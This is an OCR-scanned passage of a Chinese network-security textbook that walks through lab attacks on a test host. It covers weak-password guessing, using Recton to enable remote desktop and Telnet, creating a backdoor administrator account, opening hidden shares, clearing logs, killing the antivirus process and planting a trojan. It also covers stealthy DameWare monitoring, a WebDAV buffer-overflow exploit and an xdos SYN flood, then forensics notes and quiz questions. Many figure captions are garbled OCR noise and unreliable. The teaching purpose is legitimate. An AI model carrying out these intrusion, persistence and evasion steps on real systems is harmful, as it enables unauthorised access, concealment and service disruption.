步骤 2: 在 弱 口 令 字 典 文件 weak_pass. dic 中 添加 由 1、2、3 三 个 数字 随机 组 合 的 密码 ， 
如 123、321、213 等 ,每 个 密码 占 一 行 , 中 间 不 要 有 空 行 。 

说 明 : 由 于 本 次 模拟 攻击 只 是 演示 弱 口 令 的 攻击 过 程 ,因此 在 两 个 字典 文件 中 输入 的 用 
于 猜测 的 用 户 名 和 密码 都 比较 简单 ,只 有 几 条 。 在 实际 黑客 攻击 过 程 中 ,用 户 名 和 密码 字典 
文件 中 多 达 几 千 条 甚至 上 万 条 记录 ,用 于 被 测试 的 用 户 名 和 密码 也 不 是 手动 输入 的 ,而 是 由 
软件 自动 生成 的 ,这 些 记 录 可 能 是 3 一 4 位 纯 数 字 或 纯 字母 的 所 有 组 合 , 也 可 能 是 一 些 使 用 
频率 很 高 的 单词 或 字符 组 合 。 这 样 的 字典 可 能 在 几 分 钟 之 内 就 可 猜测 出 弱 口 令 。 

步骤 3: 运行 X-Scan 扫描 器 ,选择 "设置 >“ 扫描 参 数 " 命 令 , 打 开 “ 扫 描 参 数 ” 对 话 框 ， 
指定 IP 范围 为 192. 168. 1. 102 ,如 图 6-11 所 示 。 

步骤 4: 在 图 6-11 中 ,选择 左 侧 窗 格 中 的 “全 局 设置 ?一 “扫描 模块 ?选项 ,在 右 侧 窗 格 
中 ,为 了 加 快 扫描 速度 ,这 里 仅 选 中 “NT-Server 弱 口 令 ” 复 选 框 ,如 图 6-12 所 示 , 单 击 “ 确 
定 ” 按 钮 。 


图 6-10 设置 本 地 安全 策略 
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图 6-11 设置 扫描 范围 
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图 6-13 ”开始 弱 口 令 猜测 
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步骤 6: 等 一 会 儿 ,扫描 结束 ,会 弹出 一 个 扫描 结果 报告 ,如 图 6-14 所 示 , 可 见 已 经 猜测 
出 用 户 abe 的 密码 为 123。 
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图 6-14 扫描 结果 报告 


(3) 利用 Recton 工具 远程 人 侵 主 机 B 

@ 远程 启动 Terminal Services 服务 

步骤 1: 在 主机 B 上 ,设置 允许 远程 桌面 连接 ,如 图 6-15 所 示 。 在 主机 A 中 运行 
mstsc. exe 命令 ,设置 远程 计算 机 的 IP 地 址 (192. 168. 1. 102) 和 用 户 名 (abe) 后 ,再 单 击 “ 连 
接 ” 按 钮 ,弹出 无 法 连接 到 远程 桌面 的 提示 信息 ,如 图 6-16 所 示 , 这 是 因为 主机 B 上 没有 开 
启 Terminal Services 服务 。 
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mpPs 区 


Et 更 emone ,让 


it, 


CeO 
[CR Cm 


图 6-15 启用 远程 桌面 图 6-16 无法 连接 到 远程 桌面 


步骤 2: 在 主机 A 中 运行 人 侵 工 具 Recton v2. 5, 在 Terminal 选项 卡 中 ,输入 远程 主机 
(主机 B) 的 IP 地 址 (192. 168. 1. 102) ,用户 名 (abc) 、 密 码 (123) ,端口 (3389) 保 持 不 变 , 并 选 
中 “自动 重启 " 复 选 框 ,如 图 6-17 所 示 。 
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图 6-17 设置 远程 启动 Terminal 服务 


步骤 3: 单 击 “ 开 始 执 行 "按钮 , 则 会 开启 主机 B 上 的 Terminal 服务 ,然后 主机 也 会 自动 
重新 启动 。 
步骤 4: 主机 B 自动 重新 启动 完成 后 ,在 主机 A 上 区 
再 次 运行 mstsc. exe 命令 ,设置 远程 计算 机 的 IP 地 址 
(192. 168. 1. 102) 和 用 户 名 (abc) 后 ,再 单 击 “ 连 接 ” 按 钮 ,此 
时 出 现 了 远程 桌面 登录 界面 ,如 图 6-18 所 示 , 输 入 密码 后 
即 可 实现 远程 桌面 登录 。 ”| 
@ 远程 启动 和 停止 Telnet 服务 
步骤 1: 在 Telnet 选项 卡 中 ,输入 远程 主机 的 IP 地 图 6-18 远程 桌面 登录 界面 
址 ,用户 名 和 密码 后 , 单 击 *“ 开 始 执行 ?按钮 , 即 可 远程 启动 
主机 B 上 的 Telnet 服务 ,如 图 6-19 所 示 。 如 果 再 次 单 击 “ 开 始 执行 "按钮 , 则 会 远程 停止 主 
机 B 上 的 Telnet 服务 。 


远程 启动 /停止 Telnet 服 务 
运程 主机 设置 


ED 


[ee 


图 6-19 远程 启动 Telnet 服务 


步骤 2: 远程 启动 主机 B 上 的 Telnet 服务 后 .在 主机 A 上 运行 Telnet 192. 168. 1. 102 
命令 ,与 主机 B 建立 Telnet 连接 ,此 时 系统 询问 “是 否 将 本 机 密码 信息 送 到 远程 计算 机 
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Telnet 1 


图 6-20 系统 询问 是 否 发 送 本 机 密码 信息 


(y/n)”, 如 图 6-20 所 示 
步骤 3: 输入 n 表示 no, 再 按 Enter 键 。 此 时 系统 要 求 输入 主机 B 的 登录 用 户 名 (login) 和 
密码 (password) ,这 里 分 别 输入 abc 和 123, 密 码 在 输入 时 没有 回 显 , 如 图 6-21 所 示 。 
步骤 4: 此 时 与 主机 B 的 Telnet 连接 已 成 功 建 
立 , 命 令 提 示 符 也 变 为 C:\Documents and Settings\ 
abc 盖 。 在 该 命令 提示 符 后 面 输入 并 执行 DOS 命 
令 , 如 dir c:\ 命 令 , 即 可 显示 主机 B 上 的 C 盘 根 目 
录 中 的 所 有 文件 和 文件 夹 信息 ,如 图 6-22 所 示 图 6-21 输入 远程 主机 的 用 户 名 和 密码 
步骤 5: 黑客 可 以 利用 Telnet 连接 和 DOS 命 
令 ,在 远程 主机 上 建立 新 用 户 ,并 将 新 用 户 提升 为 管理 员 ,如 执行 net user userl 123 /add 命 
令 表示 新 建 用 户 userl ,密码 为 123; 再 执行 net localgroup administrators userl /add 命令 
表示 将 用 户 userl 加 入 管理 员 组 Administrators 中 ,如 图 6-2 
步骤 6: 此 时 ,可 在 主机 B 上 验证 是 否 新 增 了 用 户 userl ,并 隶属 于 Administrators 组 ， 
如 图 6-24 所 示 。 也 可 在 命令 提示 符 后 面 输入 net user userl 命令 来 查看 验证 。 


所 示 


图 6-22 查看 远程 主机 上 的 C 盘 根 目录 


图 6-23 ”新建 用 户 并 加 入 管理 员 组 
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BEECH 


HITCO EE 
时 x EW EW BO 


确定 取消 Li 
图 6-24 验证 新 用 户 及 所 属 的 组 


步骤 7: 黑客 可 以 利用 新 建 的 管理 员 账 号 userl 作为 后 门 , 方 便 下 次 入 侵 该 计算 机 。 如 
果 需 要 远程 删除 该 账号 ,可 输入 net user userl /del 命令 。 如 果 需 要 断 开 本 次 Telnet 连接 ， 
可 输入 exit 命令 。 

@ 在 远程 主机 上 执行 CMD 命令 

步骤 1: 在 “CMD 命令 ?选项 卡 中 ,输入 远程 主机 的 IP 地 址 ,用户 名 和 密码 后 ,在 CMD 
文本 框 中 输入 net share D$ = 二 =D:\ 命 令 , 如 图 6-25 所 示 , 单 击 *“ 开 始 执行 ?按钮 , 即 可 开启 远 
程 主 机 的 D 盘 共享 ,这 种 共享 方式 隐蔽 性 较 高 ,而且 是 完全 共享 ,在 主机 B 中 不 会 出 现 一 只 
手 托 住 盘 的 共享 标志 。 

步骤 2: 此 时 若 在 主机 A 的 浏览 器 地 址 栏 中 输入 \\192. 168. 1. 102\d$ , 即 可 访问 主机 
B( 已 开启 Guest 账户 ) 的 D 盘 , 并 可 以 进行 复制 .删除 等 操作 ,如 图 6-26 所 示 。 


远程 执行 CVD 命令 | 文件 中 ” 编 绒 @) 查看 QD) 收藏) 工具 QD) 帮助 0) 
机 © 四 -让 | 记 mm 已 zm | X 四 
ja JETIE 
Nps 


gn 三 ver 口 TN 
| 


其 他 位置 


Er 


图 6-25 开启 远程 主机 的 D 盘 共 享 图 6-26 ”访问 远程 主机 的 D 盘 


步骤 3: 如果 需 要 关闭 远程 主机 的 DD 盘 共享 ,可 在 CMD 文本 框 中 输入 net share D$ / 
delete 命令 。 

当然 ,可 在 CMD 文本 框 中 输入 其 他 命令 .达到 远程 运行 各 种 程序 的 目的 。 

印 清除 远程 主机 上 的 日 志 

黑客 为 了 消除 各 种 人 侵 痕迹 ,最 后 需要 清除 日 志 。 在 “日 志 ”? 选 项 卡 中 ,输入 远程 主机 的 
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IP 地 址 .用 户 名 和 密码 后 , 单 击 “ 开 始 执 行 ” 按 钮 ,可 以 清除 远程 主机 上 的 日 志 。 

@ 重新 启动 远程 主机 

在 “重启 ”选项 卡 中 ,输入 远程 主机 的 IP 地 址 ,用 户 名 和 密码 后 , 单 击 “开始 执行 ”按钮 ， 
即 可 重新 启动 远程 主机 。 

@ 控制 远程 主机 中 的 进程 

步骤 1: 在 “进程 ”选项 卡 中 ,输入 远程 主机 的 IP 地 址 .用 户 名 和 密码 后 ,在 进程 列表 处 
右 击 ,选择 “获取 进程 信息 ”命令 ,可 以 显示 主机 B 上 目前 正在 运行 的 所 有 进程 。 

步骤 2: 如 果 需 要 关闭 某 进程 ,如 360 杀毒 进程 360sd. exe, 防 止 以 后 要 上 传 的 木马 文件 
被 杀毒 软件 等 杀 除 ,可 右 击 该 进程 ,选择 “关闭 进程 ”命令 即 可 ,如 图 6-27 所 示 。 


图 6-27 远程 主机 上 的 进程 


Q@ 控制 远程 主机 中 的 服务 

步骤 1: 在 “服务 "选项 卡 中 ,输入 远程 主机 的 IP 地 址 、 用 户 名 和 密码 后 ,在 服务 列表 处 
右 击 , 选 择 “ 获 取 服 务 信息 ”命令 ,可 以 显示 主机 B 上 的 所 有 服务 名 、 当 前 状态 和 启动 类 型 等 
信息 ,如 图 6-28 所 示 。 其 中 “状态 ” 列 中 ,Running 表示 该 服务 已 经 启动 ,Stopped 表示 该 服 
务 已 经 停止 。“ 启 动 类 型 " 列 中 ,Auto 表示 自动 启动 .Manual 表示 手动 启动 ,Disabled 表示 
已 禁用 。 

步骤 2: 可 以 右 击 某 个 服务 ,选择 “启动 /停止 服务 ”命令 .改变 所 选 服务 的 当前 状态 。 


rt 
um 
Estee po6G163com 


图 6-28 远程 主机 上 的 服务 
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@ 控制 远程 主机 中 的 共享 
步骤 1: 在 “共享 "选项 卡 中 ,输入 远程 主机 的 IP 地 址 ,用户 名 和 密码 后 ,在 共享 列表 处 
右 击 ,选择 “获取 共享 信息 ”命令 ,可 以 查看 远程 主机 当前 所 有 的 共享 信息 ,如 图 6-29 所 示 。 


图 6-29 远程 主机 上 的 共享 


步骤 2: 如 果 要 在 远程 主机 上 新 建 共 享 ,可 以 右 击 共享 列表 ,选择 “创建 共享 "命令 ,此 时 
会 连续 弹出 三 个 对 话 框 ,根据 提示 分 别 输入 要 创建 的 共享 名 共享 路 径 和 备注 信息 后 即 可 在 
远程 主机 上 新 建 共享 磁盘 或 文件 夹 。 用 这 种 方法 新 建 的 共享 与 使 用 CMD 命令 新 建 的 共享 
是 一 样 的 ,在 远程 主机 上 不 会 显示 共享 图 标 , 且 为 完全 共享 。 

步骤 3: 如 果 需 要 关闭 某 共享 ,可 以 在 该 共享 上 右 击 ,选择 “关闭 共享 "命令 即 可 。 

@ 向 远程 主机 种 植木 马 

步骤 1: 在 “种 植 者 ”选项 卡 中 ,输入 远程 主机 的 PP 地 址 、 用 户 名 和 密码 。 从 图 6-29 可 以 
知道 ,远程 主机 上 已 有 IPC$ 共享 ,因此 在 这 里 可 以 选中 “IPC 上 传单 选 按 钮 , 单 击 “ 本 地 文件 ” 
文本 框 右 侧 的 按钮 ,选择 要 种 植 的 木马 程序 ,如 *C:\ 木 马 . exe” ,该 程序 必须 为 可 执行 文件 。 

步骤 2: 单 击 “获取 共享 目录 ”按钮 ,再 在 “共享 目录 ”和 ”对 应 路 径 ” 下 拉 列 表 中 选择 相应 
的 选项 。 在 “启动 参数 "文本 框 中 设置 木马 程序 启动 时 需要 的 参数 ,这 里 不 需要 设置 启动 参 
数 , 如 图 6-30 所 示 。 


图 6-30 ”向 远程 主机 种 植木 马 
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步骤 3: 单 击 “ 开 始 种 植 ”按钮 后 ,所 选择 的 木马 程序 文件 将 被 复制 到 远程 主机 的 共享 日 
录 中 ,木马 程序 还 将 进行 倒计时 ,60s 后 启动 已 经 种 植 在 远程 主机 上 的 木马 程序 。 

(4) 利用 DameWare 软件 远程 监控 主机 B 

步骤 1: 在 主机 A 中 安装 并 运行 DameWare( 迷 你 中 文 版 4. 5) 软 件 , 如 图 6-31 所 示 , 输 
入 远程 主机 B 的 IP 地 址 ,用户 名 和 口令 (密码 ) 。 

步骤 2: 单 击 “ 设 置 "按钮 ,在 打开 的 对 话 框 中 选择 “服务 安装 选项 ”选项 卡 , 选 中 “设置 服 
务 启动 类 型 为 “手动 -默认 为 “自动 '” 和 “复制 配置 文件 DWRCS. INI” 复 选 框 ,如 图 6-32 
所 示 。 


1 天 |。 地 地 项 |。 部 上 过 项 | 。 是 需 
0 sm | 


| 


Ci sm sl nal 


图 6-31 “远程 连接 "对话 框 图 6-32 “服务 安装 选项 "选项 卡 


步骤 3: 单 击 “ 编 辑 ” 按 钮 ,在 打开 的 对 话 框 中 选择 “通知 对 话 框 ”选项 卡 ,取消 选中 “连接 
时 通知 " 复 选 框 ,如 图 6-33 所 示 。 

步骤 4: 在 “附加 设置 "选项 卡 中 ,取消 选中 所 有 的 复 选 框 ,如 图 6-34 所 示 , 这 样 设置 的 
日 的 是 在 连接 并 监控 远程 主机 时 不 易 被 其 发 现 。 


简单 六 件 传 轴 SPT) | 代理 职务 器 JIT 过 治 器 。 |。 代理 服务 器 
第 坑 。 | 访问 。 | 附加 设置 附加 设置 | 通知 对 活 晓 | 。 用 户 选项 


Ee pe 
三 了 久 时 通知 如 Ey 
厂 断 开 加 摘 时 注销 
站 Ee 


三 岂 闻 时 妨害 工作 站 Cooo/xP) 


-it rn 


By 
厂 局 用 洛 户 六 连接 荣 单 
厂 局 用 断 开 连 接 某 音 


i ware 
MU 
厂 局 用 E-asil 通 知 Btw | 


居于 通知 到 : Ensil 地 址 ) 
和 职务 器 时 算 机 名 或 匡 地 址 ) 


se Im | 
图 6-33 “通知 对 话 框 ” 选 项 卡 图 6-34 “附加 设置 "选项 卡 


步骤 5: 单 击 “ 确 定 ” 按 钮 .返回 到 “远程 连接 ”对 话 框 , 单 击 “ 连 接 ” 按 钮 进行 远程 连接 。 
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步骤 6: 在 第 一 次 连接 远程 主机 也 时 ,会 弹出 “ 错 Dansgare 于 你 远程 控制 - 错误 - 192. 168- 1- 102 | 
误 " 对 话 框 ,提示 远程 控制 服务 没有 安装 在 远程 主机 上 ，| 各 各 Em 总 
如 图 6-35 所 示 , 单 击 “ 确 定 ” 按 钮 ,开始 安装 远程 控制 | samesswnsnarsesn aa -| 
pr 一 
服务 。 
服务 安装 完成 后 ,会 显示 远程 主机 B 的 当前 桌面 ,并 
且 同 步 显示 主机 B 的 所 有 操作 ,实现 远程 监视 主机 B 的 。 图 6.35 “错误 "对 话 杠 
目的 。 


6.4.2 任务 2: 缓冲 区 溢出 漏洞 攻击 的 演示 


1. 任务 目标 


(1) 掌握 利用 WebDAYV 缓冲 区 溢出 漏洞 进行 攻击 的 方法 。 
(2) 了 解 缓 冲 区 溢出 漏洞 的 危害 性 。 


2. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP 操作 系统 的 PC 1 台 , 作 为 主机 A( 攻 击 机 ) 。 
(2) 装 有 Windows Server 2000(IIS 5. 0) 操 作 系 统 的 PC 1 台 , 作 为 主机 B( 被 攻击 机 ) 。 
(3) WebDAVScan、WebDAVx3 工具 软件 各 1 套 。 


3. 任务 实施 步骤 


IIS 5. 0 默认 提供 了 对 WebDAV(Web-based Distributed Authoring and Versioning , 基 
于 Web 的 分 布 式 创作 和 版 本 控制 ) 的 支持 ,WebDAV 可 以 通过 HTTP 向 用 户 提供 远程 文 
件 存储 服务 。 但 是 IIS 5.0 包含 的 WebDAYV 组 件 没有 充分 检查 传递 给 部 分 系统 组 件 的 数 
据 , 远 程 攻击 者 可 以 利用 这 个 漏洞 对 WebDAV 进行 缓冲 区 溢出 攻击 ,可 能 以 Web 进程 权 
限 在 系统 上 执行 任意 指令 。 

步骤 1: 设置 主机 A 的 IP 地 址 为 192. 168.1. 101, 主 机 B 的 IP 地 址 为 192. 168. 1. 103， 
子 网 掩 码 均 为 255. 255. 255. 0。 主 机 A 利用 主机 B 上 的 WebDAYV 缓冲 区 溢出 漏洞 进行 
攻击 。 

步骤 2: 在 主机 A 上 运行 WebDAVScan 程序 ,设置 起 始 IP 地 址 和 结束 IP 地 址 均 为 
192. 168. 1. 103, 单 击 “ 扫 描 ” 按 钮 进行 WebDAV 漏洞 扫描 ,结果 如 图 6-36 所 示 , 图 中 的 
Enable 表示 主机 B 确实 存在 WebDAY 漏洞 。 

步骤 3: 复制 webdavx3. exe 程序 到 主机 A 的 *“C:\” 中 ,并 修改 主机 A 的 时 钟 到 2003 年 
4 月 21 日 之 前 ,否则 攻击 程序 webdavx3. exe 将 不 能 启动 。 

步骤 4: 修改 时 钟 后 ,在 主机 A 的 命令 行 提示 窗口 中 执行 webdavx3 192. 168. 1. 103 命 
令 , 对 主机 B 发 起 缓冲 区 溢出 漏洞 攻击 ,如 图 6-37 所 示 。 

步骤 5: 在 攻击 过 程 中 ,如 果 攻 击 停止 了 很 长 时 间 , 按 Ctrl 十 C 组 合 键 退出 。 
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Er 入 
TS rr P05 :100 e000 怠 D: 后 


图 6-36 WebDAV 缓冲 区 溢出 漏洞 扫描 


J 了 


图 6-37 ”执行 webdavx3 命令 对 有 漏洞 的 计算 机 发 起 攻击 


步骤 6: 再 执行 Telnet 192. 168. 1. 103 7788 命令 ,成功 人 cz 
侵 主 机 B, 获 得 了 对 主机 B 的 管理 员 访 问 权 限 ,如 图 6-38 所 
示 , 这 时 可 以 在 主机 B 上 执行 任何 命令 。 


图 6-38 成 功 人 侵 计算 机 


6.4.3 任务 3: 拒绝 服务 攻击 的 演示 


1. 任务 目标 


(1) 理解 拒绝 服务 攻击 的 基本 原理 。 
(2) 了 解 拒绝 服务 攻击 的 危害 性 。 


2. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows 2003 操作 系统 的 PC 1 台 , 作 为 主机 A( 攻 击 机 ) 。 
(2) 装 有 Windows XP/2003 操作 系统 的 PC 1 台 :作为 主机 B( 被 攻 才 
(3) Sniffer Pro、xdos 工具 软件 各 1 套 。 


3. 任务 实施 步骤 


6 机 )。 


步骤 1: 设置 主机 A 的 IP 地 址 为 192. 168. 1. 104, 主 机 也 的 IP 地址 为 192.168.1.101， 
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子 网 掩 码 均 为 255. 255. 255. 0。 主 机 A 对 主机 B 发 起 拒绝 服务 攻击 。 

步骤 2: 在 主机 B 上 开启 Web 服务 (80 端口 ) ,安装 并 运行 Sniffer Pro 程序 , 配 
提 从 任意 主机 发 送 给 本 机 的 IP 数据 包 , 并 启动 捕捉 进程 。 
步骤 3: 在 主机 A 上 复制 xdos. exe 程序 到 主机 A 的 “C:\” 中 ,打开 命令 行 提示 窗口 , 执 


行 xdos 192. 168. 1. 101 80 -t 200 -s * 命令 ,对 主机 了 BB 发 起 拒绝 服务 攻击 ,如 图 6-39 所 示 。 


置 好 捕 


图 6-39 利用 xdos 程序 对 主机 B 发 起 拒绝 服务 攻击 


说 明 :xdos. exe 命令 使 用 格式 为 :“xdos 一 目标 IP 端口 号 二 [-t 线程 数 ][ -s 源 
IP]”, 如 果 源 IP 为 * ,表示 使 用 随机 IP 地址。 可 以 使 用 “xdos ?” 查 看 命令 使 用 格式 。 

步骤 4: 此 时 ,在 主机 B 上 可 以 看 到 计算 机 的 处 理 速度 明显 下 降 ,其 至 瘫痪 死机 ,CPU 
在 Sniffer Pro 的 传输 地 图 中 可 以 看 到 有 大 量 伪造 IP 


使 用 率 接 近 100% ,如 图 6-40 所 示 
的 主机 请 求 与 主机 B 建立 连接 ,如 图 6-41 所 示 。 


Ee 


攻击 时 在 传输 地 图 中 看 到 与 主机 B 的 连接 情况 


图 6-40 查看 CPU 使 用 率 图 6-41 


步骤 5: 在 主机 A 上 按 Ctrl 十 C 组 合 键 .停止 攻击 。 主 机 B 恢复 快速 响应 ,CPU 使 用 率 
也 恢复 到 正常 水 平 。 在 Sniffer Pro 窗口 中 单 击 * 停 止 和 显示 ”按钮 内 后 ,可 以 看 到 有 大 量 伪 
造 IP 的 主机 请 3 主机 B 建立 连接 的 数据 包 , 且 都 是 只 请 求 不 应 答 ,以 至 于 主机 B 保持 有 
大 量 的 半 开 连接 ,运行 速度 下 降 , 甚 至 瘫痪 死机 ,拒绝 合法 的 请 求 服务 ,如 图 6-42 所 示 。 


186 


项 目 6 网 络 攻击 与 防范 


Sniffer Portable - Local， (软件 由 -高 星 洁 -修改 汉化 ) -以 太 网 ( 线 速 度 在 10 Wbps) [Snif..- 
是 文件 中 败 视 器 如 捕获 CC) 显示 @) 工具 GD 数据 床 四) 窗口 人 ) 帮助 D 


| 


分 | 二 | 全 | 总 | 当 |@| 要 | 六 | 全 | 区 | 之 | @| 加 | 

[3 EL EE 
3 [59.99.22.229] D=80 S=23675 SYN SEQ=45092 LEN=0 VIN=16384 
[S59.99.22.230] D=80 S=23676 SYN SEQ=45093 IEN=0 WIN=16384 
[59.99.22.231] D=80 S=23677 SYN SEQ=45094 IEN=0 VIN=16384 
[59.99.22.232] D=80 S=23678 SYN SEQ=45095 LEN=0 WIN=16384 
[59.99.22.233] D=80 S=23679 SYN SEQ=45096 LEN=0 WIN=16384 
D=80 S=23680 2 SER 45037 IEN=0 WIN=16384 


区 | 


3686 SYN 

3687 SYN 04 IEN=0 WIN=16384 
23688 SYN SEQ-45105 IEN-0 VIN-16384 
23689 SYN SEQ-45106 IEN"0 WIN"16384 


Ez 
2 
3 
: 
: 
9 
2 
3 
? 
i 
i 
i 
i 
15 


= (No urgent pointer) 
= (No acknovledgnent) 
= (No push) 
= (No reset) 


图 6-42 ”捕捉 到 的 攻击 数据 包 


65 拓展 提高 :网 络 入 侵 证 据 的 收集 与 分 析 


如 果 有 未 经 授权 的 入 侵 者 入 侵 了 用 户 的 网 络 , 且 破坏 了 数据 ,除了 从 备份 系统 中 恢复 数 
据 之 外 ,还 需要 做 什么 呢 ? 

从 事 网 络 安全 工作 的 人 都 知道 ,黑客 在 入 侵 之 后 都 会 想方设法 抹 去 自己 在 受害 系统 
上 的 活动 记录 ,目的 是 逃避 法 律 的 制裁 。 而 许多 企业 也 不 上 报 网 络 犯罪 ,其 原因 在 于 害 
怕 这 样 做 会 对 业务 运作 或 企业 商 誉 造成 负面 影响 ,他 们 担心 这 样 做 会 让 业务 运作 因此 失 
序 , 更 重要 的 是 收集 犯罪 证 据 有 一 定 困难 。 因 此 ,CIO(Chief Information Office, 首 席 信 息 
官 ) 们 应 该 在 应 急 响应 系统 的 建立 中 加 入 计算 机 犯罪 证 据 的 收集 与 分 析 环 节 。 


1. 什么 是 “计算 机 犯罪 取证 ” 


计算 机 取证 又 称 为 数字 取证 或 电子 取证 ,是 指 对 计算 机 入 侵 、 破 坏 、 欺 诈 、 攻 击 等 犯罪 行 
为 利用 计算 机 软 、 硬 件 技术 ,按照 符合 法 律 规范 的 方式 进行 证 据 获 取保 存 、 分 析 和 出 示 的 过 
程 。 从 技术 上 ,计算 机 取证 是 一 个 对 受 侵 计 算 机 系统 进行 扫描 和 破解 ,以 及 对 整个 人 侵 事 件 
进行 重建 的 过 程 。 

计算 机 取证 包括 物理 证 据 获 取 和 信息 发 现 两 个 阶段 。 物 理 证 据 获 取 是 指 调查 人 员 到 计 
算 机 犯罪 或 人 侵 的 现场 ,寻找 并 扣留 相关 的 计算 机 硬件 ;信息 发 现 是 指 从 原始 数据 (包括 文 
件 , 日 志 等 ) 中 寻找 可 以 用 来 证 明 或 者 反驳 的 证 据 . 即 电子 证 据 。 
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除了 那些 刚 入 门 的 “ 毛 小 子 ? 之 外 ,计算 机 犯罪 分 子 也 会 在 作案 前 周密 部 署 .作案 后 消除 
蛛丝马迹 。 他 们 更 改 、 删 除 目 标 主机 中 的 日 志文 件 ,清理 自己 的 工具 软件 ,或 利用 反 取 证 工 
具 来 破坏 侦察 人 员 的 取证 。 这 就 要 求 我 们 在 反 人 侵 的 过 程 中 ,首先 要 清楚 我 们 要 做 什么 , 然 
后 才 是 怎么 做 的 问题 。 


2. 物理 取证 是 核心 任务 


物理 取证 是 核心 任务 .物理 证 据 的 获取 是 全 部 取证 工作 的 基础 。 获 取 物 理 证 据 是 最 重 
要 的 工作 ,保证 原始 数据 不 受 任何 破坏 。 在 任何 情况 下 .调查 者 都 应 牢记 以 下 5 点。 

(1) 不 要 改变 原始 记录 。 

(2) 不 要 在 作为 证 据 的 计算 机 上 执行 无 关 的 操作 。 

(3) 不 要 给 犯罪 者 销毁 证 据 的 机 会 。 

(4) 详细 记录 所 有 的 取证 活动 。 

(5) 妥善 保存 得 到 的 物证 。 

如 果 被 人 侵 的 计算 机 处 于 工作 状态 ,取证 人 员 应 该 设法 保存 尽 可 能 多 的 犯罪 信息 。 
要 做 到 这 5 点 可 以 说 困难 重重 ,首先 可 能 出 现 的 问题 就 是 无 法 保证 业务 的 连续 性 。 由 
于 入 侵 者 的 证 据 可 能 存在 于 系统 日 志 、 数 据 文件 .寄存器 、 交 换 区 、 隐 藏 文件 ,空闲 的 磁 
盘 空 间 、 打 印 机 缓存 、 网 络 数据 区 和 计数 器 、 用 户 进程 存储 器 、 文 件 缓存 区 等 不 同 的 位 
置 。 由 此 可 见 , 物 理 取证 不 但 是 基础 ,而 且 是 技术 难点 。 通 常 的 做 法 是 将 要 获取 的 数据 
包括 从 内 存 里 获取 易 灭 失 数 据 和 从 硬盘 等 获取 相对 稳定 数据 ,保证 获取 的 顺序 为 先 内 
存 后 硬盘 。 案件 发 生 后 ,立即 对 目标 机 器 和 网 络 设备 进行 内 存 检查 并 做 好 记录 ,根据 
所 用 操作 系统 的 不 同 可 以 使 用 相应 的 内 存 检查 命令 获取 内 存 里 的 易 灭 失 数据 ,力求 不 
要 对 硬盘 进行 任何 读 / 写 操作 .以免 更 改 数据 的 原始 性 。 利 用 专门 的 工具 对 硬盘 进行 
逐 扇 区 的 读 取 , 将 硬盘 数据 完整 地 克隆 出 来 ,便于 今后 在 专门 机 器 上 对 原始 硬盘 的 镜 
像 文 件 进行 分 析 。 


3.“ 计 算 机 法 医 " 要 看 的 现场 是 什么 


有 的 时 候 , 计 算 机 取证 (Computer Forensics) 也 可 以 称 为 计算 机 法 医学 . 它 是 指 把 计 
算 机 看 做 是 犯罪 现场 ,运用 先进 的 辨析 技术 .对 计算 机 犯罪 行为 进行 法 医 式 的 解剖 ,搜寻 
确认 罪犯 及 其 犯罪 证 据 ,并 据 此 提起 诉讼 。 好 比 飞机 失事 后 ,事故 现场 和 当时 发 生 的 任 
何事 都 需要 从 飞机 的 “黑匣子 "中 获取 。 计 算 机 的 黑匣子 就 是 自身 的 日 志 记录 系统 。 从 
理论 上 讲 , 计 算 机 取证 人 员 能 否 找到 犯罪 证 据 取 决 于 :有 关 犯 罪证 据 必须 没有 被 覆盖 ; 
证 软件 必须 能 找到 这 些 数 据 ; 取 证 人 员 能 知道 这 些 文件 .并 且 能 证 明 它 们 与 犯罪 有 关 。 
但 从 海量 的 数据 里 面 寻 找 蛛 丝 马 迹 是 一 件 非常 费时 费力 的 工作 ,解决 这 一 难题 方法 的 就 
是 切 人 点 ,所 以 说 从 日 志 人 手 才 是 最 直接 .最 有 效 的 手段 。 

这 里 还 需要 指出 ,不同 的 操作 系统 都 可 以 在 Event Viewer Security( 安 全 事件 观察 器 ) 
中 能 够 检查 到 各 种 活动 和 日 志 信 息 ,但 是 其 自身 的 防护 能 力 非常 低 . 一 旦 遭受 到 入 侵 , 很 容 
易 就 被 清除 掉 。 从 中 我 们 可 以 看 到 ,专业 的 日 志 防 护 与 分 析 软 件 在 整个 安全 产品 市 场 中 的 
地 位 之 重 星 庸 置疑 。 
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66 习 题 

一 、 选 择 题 
1. 网 络 攻击 的 发 展 趋势 是 

A. 黑客 技术 与 网 络 病毒 日 益 融 合 B. 攻击 工具 日 益 先进 

C. 病毒 攻击 D. 黑客 攻击 
2. 拒绝 服务 攻击 

A. 用 超出 被 攻击 目标 处 理 能 力 的 海量 数据 包 消 耗 可 用 系统 .带宽 资源 等 方法 的 

攻击 


B. 全 称 是 Distributed Denial of Services 
C. 拒绝 来 自 一 台 服 务 器 所 发 送 回应 请 求 的 指令 
D. 入 侵 控 制 一 台 服 务 器 后 远程 关机 


3. 通过 非 直接 技术 的 攻击 手法 称 做 攻击 手法 。 
A. 会 话 支持 B. 社会 工程 学 C. 特权 提升 D. 应 用 层 攻击 
4. 关于 “攻击 工具 日 益 先 进 ,攻击 者 需要 的 技能 日 趋 下降 ” 的 观点 ,不 正确 的 
是 
A. 网 络 受 到 攻击 的 可 能 性 将 越 来 越 大 ”B. 网 络 受 到 攻击 的 可 能 性 将 越 来 越 小 
C. 网 络 攻 击 无 处 不 在 D. 网 络 风险 日 益 严 重 
5. 网 络 监听 是 
A. 远程 观察 一 个 用 户 的 计算 机 B. 监视 网 络 的 状态 .传输 的 数据 流 
C. 监视 PC 系统 的 运行 情况 D. 监视 一 个 网 站 的 发 展 方向 
6. DDoS 攻击 破坏 了 6 
A. 可 用 性 B. 保密 性 C. 完整 性 D. 真实 性 
7. 当 感觉 操作 系统 运行 速度 明显 减 慢 , 最 有 可 能 受到 攻击 。 
A. 特洛伊 木马 B. 拒绝 服务 C. 欺骗 D. 中 间 人 攻击 
8. 在 网 络 攻击 活动 中 ,Tribal Flood Network(TFN) 是 类 型 的 攻击 程序 。 
A. 拒绝 服务 B. 字典 攻击 C. 网 络 监 听 D. 病毒 程序 
9. 类 型 的 软件 能 够 阻止 外 部 主机 对 本 地 计算 机 的 端口 扫描 。 
A. 反 病 毒 软件 B. 个 人 防火 墙 
C. 基于 TCP/IP 的 检查 工具 ,如 netstat D. 加 密 软 件 

10. 网 络 型 安全 漏洞 扫描 器 的 主要 功能 有 。( 多 选 题 ) 
A. 端口 扫描 检测 B. 后 门 程序 扫描 检测 
